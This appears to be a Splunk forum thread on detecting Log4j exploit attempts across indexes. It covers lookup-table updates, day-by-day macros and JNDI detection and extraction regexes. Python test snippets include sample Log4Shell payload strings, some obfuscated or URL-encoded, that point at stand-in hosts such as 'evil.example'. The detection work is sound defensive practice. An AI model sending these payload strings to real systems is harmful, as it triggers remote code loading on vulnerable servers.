I'm updating a lookup table that tracks which indexes are affected by the new log4j exploit, so that subsequent searches only have to look through the affected indexes. Updating the lookup table takes hours for each day of data that is searched. The problem is that I need to know every affected index across all of the days since log4j activity began, around December 10th.
Query that updates lookup table:
NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
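Before committing hours to a search, it can help to check what the regex in the query above matches. Below is a minimal Python sketch of that check. The sample events are made up for illustration, and Python's `re` engine is close to but not identical to the PCRE engine Splunk uses, so treat it as a rough test only.

```python
import re

# Same pattern as the `regex _raw=...` line in the query above.
JNDI_PATTERN = re.compile(
    r"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])"
    r"(:|%3A|\$|%24|}|%7D)"
)


def looks_like_jndi(raw: str) -> bool:
    """Return True if the pattern matches anywhere in the raw event text."""
    return JNDI_PATTERN.search(raw) is not None


# Hypothetical sample events (not taken from real logs).
samples = [
    "${jndi:ldap://192.0.2.10/a}",                  # plain form
    "%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D",  # URL-encoded form
    "${${lower:j}ndi:ldap://192.0.2.10/a}",         # nested-lookup obfuscation
    "GET /index.html HTTP/1.1 200",                 # benign request
]

for sample in samples:
    print(looks_like_jndi(sample), sample)
```

The `[^jJ]*` style groups are what let the pattern tolerate obfuscation between the letters, which is also why it is expensive to run against every raw event.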
Each time this query finishes, it appends the log4j-affected indexes to the lookup table. I need to automate the scan over a large timeframe (December 10th 2021 - January 5th 2022), but I want the lookup table to update as each day completes. I'm trying to break the large 25-day search into 25 separate one-day searches, so that if one search fails I don't lose all progress. I can then apply the same methodology to other searches.
Index |
index_1 |
index_2 |
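The goal described above (scan one day at a time, skip indexes already in the lookup, and save after every day so a failure loses at most one day of work) can be sketched outside Splunk as follows. This is only an illustration of the control flow in Python: `update_incrementally`, `fake_scan`, and `FAKE_HITS` are hypothetical names, and the fake data stands in for real search results.

```python
from typing import Callable, Dict, Iterable, List, Set, Tuple

Window = Tuple[str, str]  # (earliest, latest) in Splunk time format


def update_incrementally(
    windows: Iterable[Window],
    scan_window: Callable[[Window, Set[str]], Set[str]],
    known: Set[str],
    save: Callable[[Set[str]], None],
) -> Set[str]:
    """Scan each window in turn and persist the lookup after every window."""
    known = set(known)
    for window in windows:
        # Mirrors NOT [| inputlookup ... | fields index]: skip known indexes.
        found = scan_window(window, known)
        # Mirrors inputlookup append=true followed by dedup index.
        known |= found
        # Mirrors outputlookup: progress survives a later failure.
        save(set(known))
    return known


# Hypothetical stand-in for real search results, keyed by day window.
FAKE_HITS: Dict[Window, Set[str]] = {
    ("01/02/2022:00:00:00", "01/03/2022:00:00:00"): {"index_1"},
    ("01/03/2022:00:00:00", "01/04/2022:00:00:00"): {"index_1", "index_2"},
}


def fake_scan(window: Window, skip: Set[str]) -> Set[str]:
    """Return the affected indexes for a window, excluding known ones."""
    return FAKE_HITS.get(window, set()) - skip


snapshots: List[Set[str]] = []
final = update_incrementally(FAKE_HITS.keys(), fake_scan, set(), snapshots.append)
print(sorted(final))
```

Each entry in `snapshots` corresponds to the lookup table as it would look after one day's search has finished.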
Explanation of Query below:
The gentimes part creates a table based on the selected timerange:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
I try to pass those values to a subsearch as the earliest and latest parameters using map. I understand now that map doesn't seem to work for this, and I get no results when the search runs.
|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
|fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"
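For reference, the table of one-day windows that the gentimes portion is meant to produce can be reproduced outside Splunk. The Python sketch below assumes the `%m/%d/%Y:%H:%M:%S` format used in the query; `day_windows` is a hypothetical helper name.

```python
from datetime import datetime, timedelta
from typing import List, Tuple

# Time format used for the earliest/latest values in the query above.
SPLUNK_TIME = "%m/%d/%Y:%H:%M:%S"


def day_windows(start: datetime, end: datetime) -> List[Tuple[str, str]]:
    """Split [start, end) into consecutive windows of at most one day."""
    windows = []
    cursor = start
    while cursor < end:
        upper = min(cursor + timedelta(days=1), end)
        windows.append((cursor.strftime(SPLUNK_TIME), upper.strftime(SPLUNK_TIME)))
        cursor = upper
    return windows


for earliest, latest in day_windows(datetime(2022, 1, 2), datetime(2022, 1, 5)):
    print(earliest, "|", latest)
```

Comparing this output with the rows the gentimes pipeline returns on its own is a quick way to confirm the window arithmetic before passing the values to another search.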
Explanation of Query below:
I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
This doesn't give me errors. However, I get no matches. I can almost guarantee this isn't running separate searches per value displayed in the above table. I'm not sure how this can be done.
NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),
"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
The solution to breaking up a large timeframe into smaller timeframes uses macros. The search and the macro are listed below:
- Each macro call updates the lookup table and searches only the indexes that are not already in the lookup table, so the search speeds up as more indexes are added. The next step of this process is to use the same type of macro to narrow down affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
Macro definition for lookup_updater_ultra:
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
You could try something like this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-1d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-2d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-3d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-4d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-5d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-6d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-7d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[| inputlookup indexes.csv]
Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.
If you create a macro for the append parts, e.g. index_checker(1) with the argument day:
| append
[search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
The search can be reduced to this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
[| inputlookup indexes.csv]
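For a longer range, such as the roughly 25 days mentioned in the question, the repeated macro lines could be generated rather than typed by hand. Below is a small Python sketch that assumes the one-argument `index_checker` macro described above; `macro_calls` is a hypothetical helper name.

```python
def macro_calls(days: int, macro: str = "index_checker") -> str:
    """Return one backtick-quoted macro call per day, from day 1 to `days`."""
    return "\n".join(f"`{macro}({day})`" for day in range(1, days + 1))


# Paste the output between the base search and the final append.
print(macro_calls(25))
```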
Does this mean that each day would run separately and in a certain order? Do they run at the same time? If not, which one would run first?
Also, you give me a great idea. I might be able to nest multiple macros to solve this in a way that can be used in other cases. 😁
Could you provide a few examples of the different iterations of the JNDI string that you are trying to match against?
There are hundreds of different iterations (it seems), judging by what that regex returns. The bigger issue is updating the 3 lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected_sourcetypes.csv, and log4j_malicious_sources.csv). Log4j activity started showing up around December 10th, so I need to log every malicious source that I can and then check whether there was outbound communication back to those sources. This means querying ~25 days of logs and extracting the malicious sources from them. A single 25-day search probably wouldn't go well, so I want to break it up automatically into 25 searches. At about two hours each, that would take ~3 days to run, and then I query again to look for outbound communications.
I even wrote regex to extract those malicious sources (IP or URL) from the raw data:
(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})
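As a point of comparison, here is a much simpler extraction sketch in Python. It is not equivalent to the regex above: it URL-decodes the event first and then handles only the un-obfuscated `${jndi:<scheme>://host...` form, so it will miss nested-lookup variants. `HOST_PATTERN` and `malicious_source` are hypothetical names, and the sample values are made up.

```python
import ipaddress
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Simplified pattern: only the plain "${jndi:<scheme>://<host>" form.
HOST_PATTERN = re.compile(r"\$\{jndi:[a-z]+://([^/:}\s]+)", re.IGNORECASE)


def malicious_source(raw: str) -> Optional[Tuple[str, str]]:
    """Return ("ip", value) or ("host", value) for the callback target, else None."""
    decoded = unquote(raw)  # turns %24%7B... into ${...
    match = HOST_PATTERN.search(decoded)
    if match is None:
        return None
    target = match.group(1)
    try:
        ipaddress.ip_address(target)
        return ("ip", target)
    except ValueError:
        return ("host", target)


print(malicious_source("${jndi:ldap://192.0.2.10:1389/a}"))
print(malicious_source("%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D"))
print(malicious_source("GET /index.html HTTP/1.1 200"))
```

Separating IP addresses from hostnames after extraction, rather than inside the regex, keeps the pattern short at the cost of missing obfuscated strings.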
Simplify your searches. Reconsider whether it's necessary to find every possible iteration of the JNDI string, and whether it's necessary to check every exploit attempt.
For example this "global" search took 4 seconds to complete against a 1TB/day Splunk environment.
("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string
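To see what the rex and urldecode steps above keep and what they miss, the same extraction can be tried outside Splunk. This Python sketch reuses the rex pattern with Python's named-group syntax; the sample events are hypothetical, and `extract_jndi` is an illustrative helper name.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Same alternatives as the rex above, written with Python's (?P<name>...) syntax.
JNDI_REX = re.compile(r"(?P<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))")


def extract_jndi(raw: str) -> Optional[str]:
    """Return the URL-decoded JNDI string from a raw event, or None."""
    match = JNDI_REX.search(raw)
    if match is None:
        return None
    return unquote(match.group("jndi_string"))  # same role as eval urldecode(...)


# Hypothetical sample events.
print(extract_jndi("GET /?x=${jndi:ldap://192.0.2.10/a} HTTP/1.1"))
print(extract_jndi("GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1"))
print(extract_jndi("GET /?x=${${lower:j}ndi:ldap://192.0.2.10/a} HTTP/1.1"))
```

The third sample returns nothing because the literal text `${jndi` never appears in it. That is the trade-off of the simpler search: it is fast, but it skips obfuscated attempts.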
If you have a next-generation firewall, look for outbound LDAP or DNS connections.